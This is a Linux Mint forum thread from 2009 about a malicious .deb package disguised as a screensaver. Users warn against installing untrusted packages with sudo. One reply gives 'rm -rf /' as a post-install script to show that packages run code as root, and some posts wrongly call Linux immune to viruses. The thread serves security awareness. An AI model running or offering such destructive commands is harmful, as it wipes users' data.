A deb package claiming to be a screensaver is malicious

Releases and other announcements.
Please don't post support questions here
Forum rules
Section reserved for the team. You can reply to announcements here but not post new topics.

A deb package claiming to be a screensaver is malicious

Postby Husse on Sat Dec 12, 2009 9:36 am

Found over at the Ubuntu forums
http://ubuntuforums.org/showthread.php?t=1349678
The key points here are
installed a deb from a site - only install from reliable sources
Installed with sudo - if you are root "everything" is possible
This is no screensaver but an app that connects to a site called mmowned.com and tries to download malicious code
However the code seems not to be working very well
Image
Don't fix it if it ain't broken, don't break it if you can't fix it
Husse
Level 21
Level 21
 
Posts: 19710
Joined: Sun Feb 11, 2007 7:22 am
Location: Near Borås Sweden

Linux Mint is funded by ads and donations.
 

Re: A deb package claiming to be a screensaver is malicious

Postby rich_roast on Sat Dec 12, 2009 11:22 am

Maybe I'm naïve but in almost a decade of using Linux on/off this is the first actual report of a specific malicious installer I've ever seen. First time for everything, I guess :roll:
User avatar
rich_roast
Level 6
Level 6
 
Posts: 1136
Joined: Sat Sep 05, 2009 4:37 pm

Re: A deb package claiming to be a screensaver is malicious

Postby netguz on Sat Dec 12, 2009 11:37 am

All a little beyond me!

Does this help?

http://www.mywot.com/en/forum/4227-mmow ... -green-lit

:)
netguz
Level 1
Level 1
 
Posts: 11
Joined: Sat Sep 27, 2008 1:27 pm

Re: A deb package claiming to be a screensaver is malicious

Postby midas on Sun Dec 13, 2009 3:55 am

Isn't it generally spoken not tricky to download themes and packages from websites outside synaptic??
Even installing a downloaded theme requires to install in the root-system. The safest way is not downloading and installing something outside the official Mint-repo. By doing so you will keep linux as safe as possible...
Linux Mint 16 Cinnamon (64 bits)
midas
Level 4
Level 4
 
Posts: 274
Joined: Sun Nov 25, 2007 3:47 am
Location: The Netherlands

Re: A deb package claiming to be a screensaver is malicious

Postby myspacecommassergio on Sun Dec 13, 2009 10:43 am

wierd...normally from what i hear linux doesnt have these kind of situations lol. Thanks for the heads up! 8)
User avatar
myspacecommassergio
Level 3
Level 3
 
Posts: 135
Joined: Sun Dec 13, 2009 8:02 am

Re: A deb package claiming to be a screensaver is malicious

Postby Husse on Sun Dec 13, 2009 10:51 am

@ myspacecommassergio
You are right but if you install a .deb package as root you invite the package into your system
Image
Don't fix it if it ain't broken, don't break it if you can't fix it
Husse
Level 21
Level 21
 
Posts: 19710
Joined: Sun Feb 11, 2007 7:22 am
Location: Near Borås Sweden

Re: A deb package claiming to be a screensaver is malicious

Postby myspacecommassergio on Tue Dec 15, 2009 5:49 pm

Husse wrote:@ myspacecommassergio
You are right but if you install a .deb package as root you invite the package into your system



oh wow im new to the community... so i gota install only trusted .debs then when using the Sudo command gotcha friend thanks for the warning i had no clue :!:

I'm new to this ha xD

:lol: :lol: :lol: :lol: :lol: :lol:
User avatar
myspacecommassergio
Level 3
Level 3
 
Posts: 135
Joined: Sun Dec 13, 2009 8:02 am

Re: A deb package claiming to be a screensaver is malicious

Postby Madel on Tue Dec 15, 2009 9:58 pm

anyone how knows how to program can create a malicious program and make it a .deb file.
it's up to the users stupidity to install such untrusted program.(same applies to all other operating systems)

though, it's from gnome's site, which makes most user think it's safe.
Madel
Level 1
Level 1
 
Posts: 5
Joined: Mon Dec 14, 2009 7:20 pm

Re: A deb package claiming to be a screensaver is malicious

Postby XidCat on Wed Dec 16, 2009 11:17 pm

The URL given in the link has Bots in it? xxxxx05748.t35.com/Bots/xxxxx ? Also he used chmod 777 on a script, never a good idea to cough up universal access on anything much less a script. Lots of lessons to be learned here.
"Contrariwise", continued Tweedledee, "if it was so, it might be; and if it were so, it would be; but as it isn't, it ain't. That's logic."

Lewis Carroll, Through the Looking-Glass, Chapter 4
XidCat
Level 3
Level 3
 
Posts: 148
Joined: Sun Oct 18, 2009 9:05 pm

Re: A deb package claiming to be a screensaver is malicious

Postby clem on Thu Dec 17, 2009 8:41 am

DEB packages do not only contain data, they can also contain executable code. A lot of packages do, and this code is executed with root permission. So for instance, a DEB could contain "nothing" and have an "rm -rf /" as its post-installation script, and that would be run as root...

So be aware that debs aren't simply containers, they're very much like Windows self-installing .exe files, and they get run with full permissions. One of the main reasons why Linux is safer than Windows is because distributions package the available software themselves and so you rarely have to get .debs from untrusted sources, whereas Windows simply provide the OS and lets you browse the Web to get everything else... so most Windows users are used to install things they don't know without looking at where it came from. Don't be tempted to do the same under Linux as it's just as dangerous.

Clem.
Image
User avatar
clem
Level 15
Level 15
 
Posts: 5541
Joined: Wed Nov 15, 2006 8:34 am

Re: A deb package claiming to be a screensaver is malicious

Postby clem on Thu Dec 17, 2009 10:47 am

ikey wrote:I have noticed a culture of 'selective reading' among newer users recently. i.e. they want results instantly
so will take the quickest path to...


Oh... I just selectively read that Ikey, and for a moment I thought you were talking about me :lol:
Image
User avatar
clem
Level 15
Level 15
 
Posts: 5541
Joined: Wed Nov 15, 2006 8:34 am

Re: A deb package claiming to be a screensaver is malicious

Postby ArcherSeven on Thu Dec 17, 2009 5:23 pm

Lol, awesome.
User avatar
ArcherSeven
Level 3
Level 3
 
Posts: 190
Joined: Thu Mar 19, 2009 12:57 am
Location: St. Louis, MO, USA

Re: A deb package claiming to be a screensaver is malicious

Postby Husse on Fri Dec 18, 2009 6:13 am

:mrgreen:
Image
Don't fix it if it ain't broken, don't break it if you can't fix it
Husse
Level 21
Level 21
 
Posts: 19710
Joined: Sun Feb 11, 2007 7:22 am
Location: Near Borås Sweden

Re: A deb package claiming to be a screensaver is malicious

Postby ipernar on Fri Dec 18, 2009 7:25 am

Its very hard to make any program that would run on all Linux machines without user's extra help. Thats why linux viruses have no chances. You have to be mad man to create such...
"Chicks come and go but you will always have your PS3. "
User avatar
ipernar
Level 2
Level 2
 
Posts: 91
Joined: Fri Nov 20, 2009 1:08 pm
Location: Zagreb Croatia

Re: A deb package claiming to be a screensaver is malicious

Postby markfiend on Mon Dec 21, 2009 7:38 am

ikey wrote:A chain is only as strong as its weakest link, so they say. I think Linux users should still be aware that any system
is still fallible in some way or other. Just because Linux is fundamentally more secure, this does not mean that
users should throw all caution to the wind.

Or as the saying goes: the most common source of computer failure is between the keyboard and the chair...
Omnia mutantur, nihil interit.
User avatar
markfiend
Level 4
Level 4
 
Posts: 311
Joined: Wed Apr 15, 2009 2:56 pm
Location: Leeds, UK

Re: A deb package claiming to be a screensaver is malicious

Postby Husse on Mon Dec 21, 2009 7:43 am

Or as the saying goes: the most common source of computer failure is between the keyboard and the chair...

Also called SBS :)
If you don't know what SBS is try to figure it out :)
Image
Don't fix it if it ain't broken, don't break it if you can't fix it
Husse
Level 21
Level 21
 
Posts: 19710
Joined: Sun Feb 11, 2007 7:22 am
Location: Near Borås Sweden

Re: A deb package claiming to be a screensaver is malicious

Postby myspacecommassergio on Fri Jan 01, 2010 1:07 am

Madel wrote:anyone how knows how to program can create a malicious program and make it a .deb file.
it's up to the users stupidity to install such untrusted program.(same applies to all other operating systems)

though, it's from gnome's site, which makes most user think it's safe.



well... to me personally stupid is when you know it's going to terd in your cornflakes and then you do it on purpose anyways.


If you told some one hey "heres a virus that will KO your computer luanch it/run it" and the User says oh... a virus... how exciting let me run it *click*

Then thats what I'd call stupid.

Now if someone's new to this and they go to a website full of .exe files or for linux full of .deb files and this is theyre first time using either OS then I wouldn't call them stupid I would rather say thats a learning experience and to watch out next time. Becuase if you don't know dude then honestly your not stupid you just seriously didn't know.
User avatar
myspacecommassergio
Level 3
Level 3
 
Posts: 135
Joined: Sun Dec 13, 2009 8:02 am

Re: A deb package claiming to be a screensaver is malicious

Postby greyaxe90 on Sat Jan 02, 2010 4:41 pm

And this is why I can't help but to have some fun with the people who say that Linux/Mac can't get viruses. I emphasize on can't. Some people honest to God believe that just because they're on Mac or Linux, they are invincible from viruses. Then every now and then, something like this pops up. Although I've seen it happen more on Linux, I'm surprised it doesn't happen more on Mac. But I've seen the "screensaver" trick done on Mac too.
greyaxe90
Level 1
Level 1
 
Posts: 5
Joined: Fri Jan 01, 2010 8:34 pm

Re: A deb package claiming to be a screensaver is malicious

Postby Husse on Sat Jan 02, 2010 5:12 pm

To get this "scary thing" to happen you had to trick the user to use sudo
When you're root lots of things can happen, that's why you should avoid it
But yes, viruses can infect Linux, but they have a much harder time than in Windows (don't know about Mac)
Image
Don't fix it if it ain't broken, don't break it if you can't fix it
Husse
Level 21
Level 21
 
Posts: 19710
Joined: Sun Feb 11, 2007 7:22 am
Location: Near Borås Sweden

Re: A deb package claiming to be a screensaver is malicious

Postby greyaxe90 on Sat Jan 02, 2010 9:02 pm

Mac is about the same as Linux. Mac, in a sense, is comparable to Mint and Ubuntu where the user has to give permission for the software to run by inputing their password when they install it.
greyaxe90
Level 1
Level 1
 
Posts: 5
Joined: Fri Jan 01, 2010 8:34 pm

Linux Mint is funded by ads and donations.
 
Next

Return to Releases & Announcements

Who is online

Users browsing this forum: No registered users and 3 guests